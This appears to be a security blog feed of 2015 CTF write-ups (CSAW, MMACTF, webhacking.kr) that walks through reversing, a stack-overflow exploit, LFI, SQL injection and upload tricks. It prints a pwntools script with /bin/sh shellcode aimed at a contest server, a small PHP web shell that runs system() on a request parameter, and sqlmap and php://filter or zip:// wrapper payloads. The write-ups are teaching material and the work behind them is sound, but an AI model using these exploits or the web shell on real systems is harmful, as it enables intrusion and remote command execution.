class="o">:</span><span class="mf">000000000040E2</span><span class="n">B6</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">lea</span> <span class="n">rsi</span><span class="p">,</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_118</span><span class="p">]</span> <span class="p">;</span> <span class="n">std</span><span class="o">::</span><span class="n">string</span> <span class="o">*</span> <span class="c1">//Initialise another object with user input</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E2</span><span class="n">BD</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">call</span> <span class="n">__ZNSsC1ERKSs</span> <span class="p">;</span> <span class="n">std</span><span class="o">::</span><span class="n">string</span><span class="o">::</span><span class="n">string</span><span class="p">(</span><span class="n">std</span><span class="o">::</span><span class="n">string</span> <span class="k">const</span><span class="o">&amp;</span><span class="p">)</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E2</span><span class="n">C7</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">lea</span> <span class="n">rdi</span><span class="p">,</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_140</span><span class="p">]</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E2</span><span class="n">CE</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">call</span> <span class="n">_Z15reward_strengthSs</span> <span class="p">;</span> <span class="n">reward_strength</span><span class="p">(</span><span class="n">std</span><span class="o">::</span><span class="n">string</span><span class="p">)</span> <span class="c1">//User input string object is passed to_reward strength</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E2</span><span class="n">CE</span> <span class="c1">//reward_strength prints flag is flag{\%s},userinput</span></code></pre></figure> <p>From this piece of disassemble, we get the following interesting facts</p> <ul> <li>User input length should be &lt; 127</li> <li>If return value of <code class="language-plaintext highlighter-rouge">start_quest(string(user input))</code> is <code class="language-plaintext highlighter-rouge">0x1337</code>, then the program outputs that string as flag</li> <li>Any other return value makes the program print -&gt; You have failed</li> </ul> <p>Now instead of fully disassembling start_quest, we will just note down the points that I found interesting</p> <ul> <li>28 variables, all starting with <code class="language-plaintext highlighter-rouge">secret_</code> are pushed onto a newly created vector.</li> <li>String length of the inputted string is compared to 28</li> <li>If string length is not equal to 28, the function just returns 28 itself.</li> </ul> <p>After getting all the above instructions, I decided to do run-time analysis on the binary.</p> <p>I loaded up the binary in gdb and made a breakpoint,so as to read the return value of <code class="language-plaintext highlighter-rouge">start_quest</code>. For the first run,I inputted a string of 28 <code class="language-plaintext highlighter-rouge">a</code>.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gdb -q wyvern Reading symbols from wyvern...(no debugging symbols found)...done. (gdb) break *0x040e266 Breakpoint 1 at 0x40e266 (gdb) r Starting program: /home/lostsoul/Documents/Misc/CTF/CSAW_2015/wyvern/wyvern +-----------------------+ | Welcome Hero | +-----------------------+ [!] Quest: there is a dragon prowling the domain. brute strength and magic is our only hope. Test your skill. Enter the dragons secret: aaaaaaaaaaaaaaaaaaaaaaaaaaaa Breakpoint 1, 0x000000000040e266 in main () (gdb) p $eax $1 = 0 (gdb) c Continuing. [-] You have failed. The dragons power, speed and intelligence was greater. [Inferior 1 (process 13721) exited normally] </code></pre></div></div> <p>The return value was found to be zero.After trying multiple strings, all of length 28, in all cases, the return value was zero. Remember the vector that was created early? I tried placing the first value as the char representation of first value pushed, ie <code class="language-plaintext highlighter-rouge">d</code>.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) r Starting program: /home/lostsoul/Documents/Misc/CTF/CSAW_2015/wyvern/wyvern +-----------------------+ | Welcome Hero | +-----------------------+ [!] Quest: there is a dragon prowling the domain. brute strength and magic is our only hope. Test your skill. Enter the dragons secret: daaaaaaaaaaaaaaaaaaaaaaaaaaa Breakpoint 1, 0x000000000040e266 in main () (gdb) p $eax $2 = 256 (gdb) c Continuing. [-] You have failed. The dragons power, speed and intelligence was greater. [Inferior 1 (process 14525) exited normally] </code></pre></div></div> <p>Now as you see above,the value have changed.The second value pused into the vector is not a valid ascii. So I tried to bruteforce the second character, which changed the return value and landed up in <code class="language-plaintext highlighter-rouge">r</code>.</p> <p>Then I took a closer look at the values pushed, and I found out that the 2nd value pushed is a sum of ascii(d)+ascii(r). Therefore I concluded that the values pushed into the vector are cumulative sums of ascii values of the characters of the flag.</p> <p>To verify my theory, I took the 3rd value pushed on to the stack and subtracted the sum of ascii values of <code class="language-plaintext highlighter-rouge">d</code> and <code class="language-plaintext highlighter-rouge">r</code>. Then I took the character representing the resultant value.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(266 -(ascii(d)+ascii(r)))=52 52 -&gt; '4' </code></pre></div></div> <p>When I substituted the 3rd value as 4, the return value again changed, meaning it was the correct value.</p> <p>After uncovering this connection, finding out the flag was trivial.</p> <p>The C program I wrote for it is given below.</p> <figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include</span><span class="cpf">&lt;stdio.h&gt;</span><span class="cp"> </span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">calc_flag</span><span class="p">(</span><span class="kt">int</span><span class="o">*</span> <span class="n">arr</span><span class="p">,</span><span class="kt">char</span><span class="o">*</span> <span class="n">result</span><span class="p">){</span> <span class="kt">int</span> <span class="n">accumulator</span><span class="o">=</span><span class="mi">0</span><span class="p">,</span><span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="k">for</span><span class="p">(</span><span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="n">i</span><span class="o">&lt;</span><span class="mi">28</span><span class="p">;</span><span class="n">i</span><span class="o">++</span><span class="p">){</span> <span class="n">result</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">=</span><span class="n">arr</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">-</span><span class="n">accumulator</span><span class="p">;</span> <span class="n">accumulator</span> <span class="o">=</span> <span class="n">accumulator</span><span class="o">+</span><span class="n">result</span><span class="p">[</span><span class="n">i</span><span class="p">];</span> <span class="p">}</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(){</span> <span class="kt">int</span> <span class="n">arr</span><span class="p">[</span><span class="mi">28</span><span class="p">]</span><span class="o">=</span><span class="p">{</span> <span class="mi">100</span><span class="p">,</span><span class="mi">214</span><span class="p">,</span><span class="mi">266</span><span class="p">,</span><span class="mi">369</span><span class="p">,</span><span class="mi">417</span><span class="p">,</span><span class="mi">527</span><span class="p">,</span><span class="mi">622</span><span class="p">,</span><span class="mi">733</span><span class="p">,</span><span class="mi">847</span><span class="p">,</span> <span class="mi">942</span><span class="p">,</span><span class="mi">1054</span><span class="p">,</span><span class="mi">1106</span><span class="p">,</span><span class="mi">1222</span><span class="p">,</span><span class="mi">1336</span><span class="p">,</span><span class="mi">1441</span><span class="p">,</span><span class="mi">1540</span><span class="p">,</span> <span class="mi">1589</span><span class="p">,</span><span class="mi">1686</span><span class="p">,</span><span class="mi">1796</span><span class="p">,</span><span class="mi">1891</span><span class="p">,</span><span class="mi">1996</span><span class="p">,</span><span class="mi">2112</span><span class="p">,</span><span class="mi">2165</span><span class="p">,</span> <span class="mi">2260</span><span class="p">,</span><span class="mi">2336</span><span class="p">,</span><span class="mi">2412</span><span class="p">,</span><span class="mi">2498</span><span class="p">,</span><span class="mi">2575</span> <span class="p">},</span><span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="kt">char</span> <span class="n">result</span><span class="p">[</span><span class="mi">28</span><span class="p">];</span> <span class="n">calc_flag</span><span class="p">(</span><span class="n">arr</span><span class="p">,</span><span class="n">result</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Flag is :: "</span><span class="p">);</span> <span class="k">for</span><span class="p">(</span><span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="n">i</span><span class="o">&lt;</span><span class="mi">28</span><span class="p">;</span><span class="n">i</span><span class="o">++</span><span class="p">){</span> <span class="n">printf</span><span class="p">(</span><span class="s">"%c"</span><span class="p">,</span><span class="n">result</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span> <span class="p">}</span> <span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>Compiling and running the above C code will print the flag :</p> <p><code class="language-plaintext highlighter-rouge">Flag is :: dr4g0n_or_p4tric1an_it5_LLVM</code></p> <p>To validate it, run the program and enter the above string.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>temp@temp ~/D/M/C/C/wyvern&gt; ./wyvern +-----------------------+ | Welcome Hero | +-----------------------+ [!] Quest: there is a dragon prowling the domain. brute strength and magic is our only hope. Test your skill. Enter the dragon's secret: dr4g0n_or_p4tric1an_it5_LLVM success [+] A great success! Here is a flag{dr4g0n_or_p4tric1an_it5_LLVM} </code></pre></div></div> <p>So our flag is correct !</p> Tue, 22 Sep 2015 00:00:00 -0700 https://blog.0daylabs.com/2015/09/22/csaw-rev-500-write-up/ https://blog.0daylabs.com/2015/09/22/csaw-rev-500-write-up/ ctf-reversing Cookies are Delicious - CSAW 2015 Exploitation 100 Writeup <p>The binary prints out the address of the buffer during execution and also presents a blatant buffer overflow with the scanf(<code class="language-plaintext highlighter-rouge">%s</code>). Checking out the binary in gdb-peda showed that NX was disabled. So the scenario I thought was <code class="language-plaintext highlighter-rouge">Buffer overflow with ASLR on and possible return to shellcode.</code></p> <p>But the problem with this method is that a variable resembling a stack-cookie is placed at a higher memory address compared to the buffer. The program, before the epilogue, checks whether or not the value of this stack-cookie has been altered. If it has been altered, then the program calls exit() which renders our overflow useless.</p> <p>So what we need to do is to overflow the buffer in such a way that the stack-cookie is overwritten with its original value itself. The cookie is at an offset of 128 bytes from the starting of the buffer and it is 10 bytes long.So the only thing left to do is to write a nice python code to do all this for us.</p> <p><strong>Expecto Pythonum</strong></p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">context</span><span class="p">.</span><span class="n">binary</span><span class="o">=</span><span class="s">"precision"</span> <span class="n">host</span><span class="o">=</span><span class="s">"54.173.98.115"</span> <span class="n">port</span><span class="o">=</span><span class="mi">1259</span> <span class="n">p</span><span class="o">=</span><span class="n">remote</span><span class="p">(</span><span class="n">host</span><span class="p">,</span><span class="n">port</span><span class="p">)</span> <span class="n">context</span><span class="p">.</span><span class="n">bits</span><span class="o">=</span><span class="mi">32</span> <span class="n">msg</span><span class="o">=</span><span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span> <span class="k">print</span> <span class="n">msg</span> <span class="n">buf_addr</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span> <span class="n">msg</span><span class="p">[</span><span class="n">msg</span><span class="p">.</span><span class="n">find</span><span class="p">(</span><span class="s">":"</span><span class="p">)</span><span class="o">+</span><span class="mi">2</span><span class="p">:],</span><span class="mi">16</span><span class="p">)</span><span class="c1">#the address of buffer which is being printed onto the screen </span><span class="k">print</span> <span class="nb">hex</span><span class="p">(</span><span class="n">buf_addr</span><span class="p">)</span> <span class="n">shellcode</span><span class="o">=</span> <span class="s">"</span><span class="se">\x31\xc0\xb0\x30</span><span class="s">"</span> <span class="o">+</span><span class="s">"</span><span class="se">\x01\xc4\x30\xc0</span><span class="s">"</span> <span class="o">+</span><span class="s">"</span><span class="se">\x50\x68\x2f\x2f</span><span class="s">"</span> <span class="o">+</span><span class="s">"</span><span class="se">\x73\x68\x68\x2f</span><span class="s">"</span> <span class="o">+</span><span class="s">"</span><span class="se">\x62\x69\x6e\x89</span><span class="s">"</span> <span class="o">+</span><span class="s">"</span><span class="se">\xe3\x89\xc1\xb0</span><span class="s">"</span> <span class="o">+</span><span class="s">"</span><span class="se">\xb0\xc0\xe8\x04</span><span class="s">"</span> <span class="o">+</span><span class="s">"</span><span class="se">\xcd\x80\xc0\xe8</span><span class="s">"</span> <span class="o">+</span><span class="s">"</span><span class="se">\x03\xcd\x80</span><span class="s">"</span> <span class="n">payload</span><span class="o">=</span><span class="n">shellcode</span> <span class="n">payload</span><span class="o">+=</span><span class="s">"B"</span><span class="o">*</span><span class="p">(</span><span class="mi">128</span><span class="o">-</span><span class="nb">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">))</span> <span class="n">payload</span><span class="o">+=</span><span class="n">pack</span><span class="p">(</span><span class="mh">0x475a31a5</span><span class="p">)</span><span class="o">+</span><span class="n">pack</span><span class="p">(</span><span class="mh">0x40501555</span><span class="p">)</span><span class="o">+</span><span class="s">"</span><span class="se">\xe0\x85</span><span class="s">"</span> <span class="c1">#the value of the stack-cookie </span><span class="n">payload</span><span class="o">+=</span><span class="s">"C"</span><span class="o">*</span><span class="mi">10</span> <span class="c1">#rest of padding required to reach saved instruction pointer </span><span class="n">payload</span><span class="o">+=</span><span class="n">pack</span><span class="p">(</span><span class="n">buf_addr</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span></code></pre></figure> <p>….Aaaand Voila! Shell..</p> Tue, 22 Sep 2015 00:00:00 -0700 https://blog.0daylabs.com/2015/09/22/csaw-pwn-100-write-up/ https://blog.0daylabs.com/2015/09/22/csaw-pwn-100-write-up/ pwn Breaking the CTF framework - CSAW 2015 web 600 writeup <p>Well, after I saw the challenge for the first time, I was like “dafaq! Should we find a zero day in CSAW CTF Framework now ?”. I immediately searched their framework source code hoping it to be open sourced and I was correct. I got the source code from their <a href="https://github.com/isislab/CTFd/">github</a> and now what ? Its hell long and I don’t wanna sit and read the entire thing so I looked into the issues and recent commits. I was damn sure that this has to do something with a recent commit. Then one of the commits got my attention: <a href="https://github.com/ajvpot/CTFd/commit/9578355143d7af675fc4776b0f2de802be91e261">commit</a></p> <p>And the commit msg was: <code class="language-plaintext highlighter-rouge">Fix authentication for certain admin actions</code>. That itself is suspicious right ? Well atleast to me it was. So here is an interesting part of the code:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="o">@</span><span class="n">admin</span><span class="p">.</span><span class="n">route</span><span class="p">(</span><span class="s">'/admin/chal/new'</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s">'POST'</span><span class="p">])</span> <span class="o">@</span><span class="n">admins_only</span> <span class="k">def</span> <span class="nf">admin_create_chal</span><span class="p">():</span> <span class="n">files</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">files</span><span class="p">.</span><span class="n">getlist</span><span class="p">(</span><span class="s">'files[]'</span><span class="p">)</span> <span class="c1"># Create challenge </span> <span class="n">chal</span> <span class="o">=</span> <span class="n">Challenges</span><span class="p">(</span><span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="s">'name'</span><span class="p">],</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="s">'desc'</span><span class="p">],</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="s">'value'</span><span class="p">],</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="s">'category'</span><span class="p">])</span> <span class="n">db</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="n">add</span><span class="p">(</span><span class="n">chal</span><span class="p">)</span> <span class="n">db</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="n">commit</span><span class="p">()</span></code></pre></figure> <p>Well, lets visit the URL and I got a message saying <code class="language-plaintext highlighter-rouge">Method not Allowded</code> and I didn’t get redirected to a login page ~! Strange isn’t it ? For any of the URL other than the 3 URL’s, if we try to access <code class="language-plaintext highlighter-rouge">/admin/</code> its gonna redirect you to login but not this, interesting ! Lets try giving other types of requests then. So I fired up the python terminal and did a post request, and there is the flag in the response !</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">requests</span> <span class="n">req</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="n">https</span><span class="p">:</span><span class="o">//</span><span class="n">ctf</span><span class="p">.</span><span class="n">isis</span><span class="p">.</span><span class="n">poly</span><span class="p">.</span><span class="n">edu</span><span class="o">/</span><span class="n">admin</span><span class="o">/</span><span class="n">chal</span><span class="o">/</span><span class="n">delete</span><span class="p">)</span> <span class="n">req</span><span class="p">.</span><span class="n">text</span></code></pre></figure> <p>Now that was a pretty easy challenge. :)</p> Mon, 21 Sep 2015 00:00:00 -0700 https://blog.0daylabs.com/2015/09/21/csaw-web-600-write-up/ https://blog.0daylabs.com/2015/09/21/csaw-web-600-write-up/ webchallenges ctf-web First Ashley Madison now Weebdate - CSAW 2015 web 500 writeup <p>This challenge was pretty difficult and I should say even more difficult than Web600. So first I went to the <code class="language-plaintext highlighter-rouge">Weebdate</code> site and registered a new account. It games me a TOTP key which I should use to generate a one time login key and login with it. So I used a standard <a href="https://github.com/pyotp/pyotp">python library</a> to get my key (which changes every 30 sec) and I logged in. I immediately clicked on <code class="language-plaintext highlighter-rouge">edit profile</code> and there we have an option to add images from other sources. Looks suspecious ? How about an LFI ? We cannot use <code class="language-plaintext highlighter-rouge">php://filter</code> since we are not even sure that we are dealing with php here. So I tried giving arbitrary inputs and I got an awesome error back: <code class="language-plaintext highlighter-rouge">Malformed url ParseResult(scheme='', netloc='', path=u'/', params='', query='', fragment='')</code>. That looks pretty interesting. So we need a scheme. How about <code class="language-plaintext highlighter-rouge">file://</code> ?</p> <p>Well file protocol worked and I tried including apache conf files, and all those and ultimately reached here: <code class="language-plaintext highlighter-rouge">file://localhost/var/www/weeb/server.py</code> and that pretty much gave me the source code. So after going through it, I understood they are using some random<code class="language-plaintext highlighter-rouge">utils</code> files which is not a standard python file and I tried printing its source code: <code class="language-plaintext highlighter-rouge">file://localhost/var/www/weeb/utils.py</code> which has the functions we need.</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">generate_seed</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">ip_address</span><span class="p">):</span> <span class="k">return</span> <span class="nb">int</span><span class="p">(</span><span class="n">struct</span><span class="p">.</span><span class="n">unpack</span><span class="p">(</span><span class="s">"I"</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_aton</span><span class="p">(</span><span class="n">ip_address</span><span class="p">))[</span><span class="mi">0</span><span class="p">])</span> <span class="o">+</span> <span class="n">struct</span><span class="p">.</span><span class="n">unpack</span><span class="p">(</span><span class="s">"I"</span><span class="p">,</span> <span class="n">username</span><span class="p">[:</span><span class="mi">4</span><span class="p">].</span><span class="n">ljust</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span><span class="s">"0"</span><span class="p">))[</span><span class="mi">0</span><span class="p">]</span> <span class="k">def</span> <span class="nf">get_totp_key</span><span class="p">(</span><span class="n">seed</span><span class="p">):</span> <span class="n">random</span><span class="p">.</span><span class="n">seed</span><span class="p">(</span><span class="n">seed</span><span class="p">)</span> <span class="k">return</span> <span class="n">pyotp</span><span class="p">.</span><span class="n">random_base32</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span> <span class="n">random</span><span class="p">)</span></code></pre></figure> <p>So these functions can return me the OTP. But now I need the password and Ipaddress. The only possible way to get it is from the database. I got stuck at this point for a long time and then got a link <code class="language-plaintext highlighter-rouge">http://54.210.118.179/csp/view/411</code> which downloads a JSOn. When I added a single quote to the URL, it gives me back internal server error which pretty much means that we got an sql injection point. So time to run sqlmap: <code class="language-plaintext highlighter-rouge">python sqlmap.py --level=5 --risk=3 -u "http://54.210.118.179/csp/view/3444" -a</code> which dumps me everything. I was eagerly searching for IP address which I got but instead of getting a password, I got a hash. Now I should crack the hash ?</p> <p>I tried some common bruteforce approch guessing that password hash will be sha256(username+pass) and after a while I got the password which was <code class="language-plaintext highlighter-rouge">zebra</code>. Now we have everything we want to run the 2 functions that we got above. Just run it with the data we got and flag is ours !</p> Mon, 21 Sep 2015 00:00:00 -0700 https://blog.0daylabs.com/2015/09/21/csaw-web-500-write-up/ https://blog.0daylabs.com/2015/09/21/csaw-web-500-write-up/ webchallenges ctf-web Bypassing PHP strcmp() - CSAW 2015 web 200 writeup <p>Well this challenge was very easy and I guess it has the highest number of solves in web category during CSAW 2015. Here we have a simple login form and and we should login to get the flag. But the register is not working and SQL injection also doesn’t seems to work. So I was wondering how can the check be in server side and if it is using php function <code class="language-plaintext highlighter-rouge">strcmp()</code> then things would be pretty easy. So I tried capturing the request with tamper data and replaced the <code class="language-plaintext highlighter-rouge">password=lol</code> with <code class="language-plaintext highlighter-rouge">password[]=lol</code> and it easily bypassed the authentication. And yea it gives back the flag too :)</p> <p>FOr those who don’t know how this works, lets say we have an example code like this:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="err">$</span><span class="n">username</span> <span class="o">=</span> <span class="err">$</span><span class="n">_POST</span><span class="p">[</span><span class="s">'username'</span><span class="p">];</span> <span class="err">$</span><span class="n">password</span> <span class="o">=</span> <span class="err">$</span><span class="n">_POST</span><span class="p">[</span><span class="s">'password'</span><span class="p">];</span> <span class="err">$</span><span class="n">real_password</span> <span class="o">=</span> <span class="s">"original password here"</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="err">$</span><span class="n">password</span><span class="p">,</span> <span class="err">$</span><span class="n">real_password</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">echo</span> <span class="s">"flag{}"</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>If this is the code, if we give post request like this <code class="language-plaintext highlighter-rouge">password[]=lol</code> then the $password becomes an array. Now comparing this, instead of throwing an error, it returns NULL and in PHP NULL == 0, which means string comparison passed and we got the flag :)</p> Mon, 21 Sep 2015 00:00:00 -0700 https://blog.0daylabs.com/2015/09/21/csaw-web-200-write-up/ https://blog.0daylabs.com/2015/09/21/csaw-web-200-write-up/ webchallenges ctf-web Local File inclusion + File Upload = Remote Code execution - MMACTF 2015 web 300 writeup <p>We are greeted with a page which has both register and a login option. After playing around a bit with it, I decided to register a new account and to my surprise I saw a file upload option (man I love file uploads). Also I noticed the URL structure which looks like this:</p> <p><code class="language-plaintext highlighter-rouge">http://magiagents.chal.mmactf.link/index.php?page=settings</code></p> <p>It seems they are including pages so I tried to use <code class="language-plaintext highlighter-rouge">php://filters</code> to print out the source code in base64 and it did :-).</p> <p><code class="language-plaintext highlighter-rouge">http://magiagents.chal.mmactf.link/index.php?page=php://filter/convert.base64-encode/resource=home</code></p> <p>Using the same method I got the source code for all the pages including <code class="language-plaintext highlighter-rouge">db.php</code>, <code class="language-plaintext highlighter-rouge">settings.php</code>, and <code class="language-plaintext highlighter-rouge">login.php</code>. From the <code class="language-plaintext highlighter-rouge">settings.php</code> I understood that the <code class="language-plaintext highlighter-rouge">sha1</code> of the uploaded image is taken as the filename and if it is has a jpg/png extension, it is also appended to the final filename and is stored in a directory <code class="language-plaintext highlighter-rouge">avators</code>. If it has any other extensions, it simply neglects it.</p> <p>One quick thing came to mind is to upload a php shell and include it via the LFI but a problem that I faced is that the the server was automatically appending <code class="language-plaintext highlighter-rouge">.php</code> extension to which ever filename and they are using the latest version of php where nullbyte <code class="language-plaintext highlighter-rouge">%00</code> injection will not work. Well, I didn’t had a clue what to do next.</p> <p>I started looking at the other available php wrappers and I came across an interesting one called <code class="language-plaintext highlighter-rouge">zip:///path/to/filename#dir/file</code> and that looks pretty interesting. So I wrote a simple php shell, compressed it (.zip) and renamed it to <code class="language-plaintext highlighter-rouge">shell.jpg</code> and I uploaded it. So now I have my shell in the zip format. Then I included the location of the shell via zip wrapper:</p> <p><code class="language-plaintext highlighter-rouge">http://magiagents.chal.mmactf.link/index.php?page=zip://avators/bi0sca70c2c8ad1dc9376848131c3b90d99f2d3833ee.jpg%23shell</code></p> <p>So the zip intakes the image for extraction and its a valid zip. So it extracted, I gave a name <code class="language-plaintext highlighter-rouge">shell</code> to the extracted file and the server added the <code class="language-plaintext highlighter-rouge">.php</code> extension for me which easily executed. From the <code class="language-plaintext highlighter-rouge">home.php</code> source code, I knew the location of the flag and all I did was to use webshell to print it for me.</p> <p>The challenge was really amazing and I am excited to learn new concepts like this. Thanks for the MMACTF organizers for taking efforts to create good challenges.</p> Mon, 07 Sep 2015 00:00:00 -0700 https://blog.0daylabs.com/2015/09/07/mmactf-web300-challenge-writeup/ https://blog.0daylabs.com/2015/09/07/mmactf-web300-challenge-writeup/ webchallenges ctf-web Executing php using script tags - MMACTF 2015, Uploader, web 100 writeup <p>Well this was quite a fascinating challenge. We are greeted with a challenge which has a direct file upload which even uploads <code class="language-plaintext highlighter-rouge">.php</code> but will not execute it because there is a filter which goes through the file we uploaded and removes all <code class="language-plaintext highlighter-rouge">&lt;?php</code> tags from it. I tried several ways to escape out of Regex filter (or what ever filter they are using) but I just couldn’t do it.</p> <p>After reading and trying a lot of different methods (every single one failed), I read the description of the challenge again:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>This uploader deletes all /&lt;\?|php/. So you cannot run php. </code></pre></div></div> <p>Well, now thats interesting. If they want to disallow the PHP execution, they why did they allow us to upload <code class="language-plaintext highlighter-rouge">.php</code> extension files ? They can easily limit the upload feature but they didn’t which means our aim is to execute php web shell without using the <code class="language-plaintext highlighter-rouge">&lt;?php</code> to write the code.</p> <p>Frankly speaking, I had no idea on how to execute without adding <code class="language-plaintext highlighter-rouge">&lt;?php</code>. So I googled around to see an alternative option and I was shocked to read <strong><a href="http://php.net/manual/en/language.basic-syntax.phptags.php">php tags documentation</a></strong>. Did you see an awesome method of executing php there ?</p> <p><code class="language-plaintext highlighter-rouge">&lt;script language="php"&gt; &lt;/script&gt;</code></p> <p>That moment I didn’t know how to explain but I was quite surprised. Now lets right a simple web shell using the same:</p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="nt">&lt;script </span><span class="na">language=</span><span class="s">"phP"</span><span class="nt">&gt;</span> <span class="k">if</span><span class="p">(</span><span class="nx">isset</span><span class="p">(</span><span class="nx">$_REQUEST</span><span class="p">[</span><span class="dl">'</span><span class="s1">cmd</span><span class="dl">'</span><span class="p">])){</span> <span class="nx">$cmd</span> <span class="o">=</span> <span class="p">(</span><span class="nx">$_REQUEST</span><span class="p">[</span><span class="dl">"</span><span class="s2">cmd</span><span class="dl">"</span><span class="p">]);</span> <span class="nx">system</span><span class="p">(</span><span class="nx">$cmd</span><span class="p">);</span> <span class="nx">die</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>.</p> <p>Called it <code class="language-plaintext highlighter-rouge">shell.php</code> and uploaded it. The uploader gives me direct access to the file with which I can run system commands :-). Now its a matter of searching for the flag and it was there in the root directory itself.</p> <p><code class="language-plaintext highlighter-rouge">http://recocta.chal.mmactf.link:9080/u/shelll.php?cmd=cat%20/flag</code></p> <p>This gives me back the flag I was looking for.</p> <p>Flag: <code class="language-plaintext highlighter-rouge">MMA{you can run php from script tag} </code></p> <p>The challenge were super fun and a good learning too. I never knew that <code class="language-plaintext highlighter-rouge">&lt;script language="php"&gt;</code> could actually execute php. Thanks to the organizers of MMACTF for the awesome challenges.</p> <p>Also read: <a href="https://blog.0daylabs.com/2015/09/07/mmactf-web300-challenge-writeup/">Local File inclusion + File Upload = Remote Code execution - MMACTF 2015 web 300 writeup</a></p> Mon, 07 Sep 2015 00:00:00 -0700 https://blog.0daylabs.com/2015/09/07/mmact-web-100-challenge/ https://blog.0daylabs.com/2015/09/07/mmact-web-100-challenge/ webchallenges ctf-web webhacking.kr - 0ldzombie challenge writeup 1 <p>0ldzombie has a great collection of <a href="http://webhacking.kr">Webhacking challenges</a> which ranges from very basic ones to some very advanced attacks. I must admit, I really enjoyed playing the challenges and I am putting up the writeup here on my blog.</p> <p><strong>Note:</strong> <em>I am putting up the write up on my blog so that if you are not able to complete the challenges after trying for awhile, you can refer to the solution to see how I did it. Please don’t look into the solution before you try out the challenges by yourself.</em></p> <p>Let us look into the first challenge. As you can see, they show us a page named <code class="language-plaintext highlighter-rouge">index.phps</code>. Let us look at the content inside it:</p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1 2 3 4 5 6 7 8 9 10 11 12 13 </pre></td><td class="code"><pre><span class="cp">&lt;?</span> <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="n">user_lv</span><span class="p">])</span> <span class="p">{</span> <span class="nb">SetCookie</span><span class="p">(</span><span class="s2">"user_lv"</span><span class="p">,</span><span class="s2">"1"</span><span class="p">);</span> <span class="k">echo</span><span class="p">(</span><span class="s2">"&lt;meta http-equiv=refresh content=0&gt;"</span><span class="p">);</span> <span class="p">}</span> <span class="nv">$password</span><span class="o">=</span><span class="s2">"????"</span><span class="p">;</span> <span class="k">if</span><span class="p">(</span><span class="nb">eregi</span><span class="p">(</span><span class="s2">"[^0-9,.]"</span><span class="p">,</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="n">user_lv</span><span class="p">]))</span> <span class="nv">$_COOKIE</span><span class="p">[</span><span class="n">user_lv</span><span class="p">]</span><span class="o">=</span><span 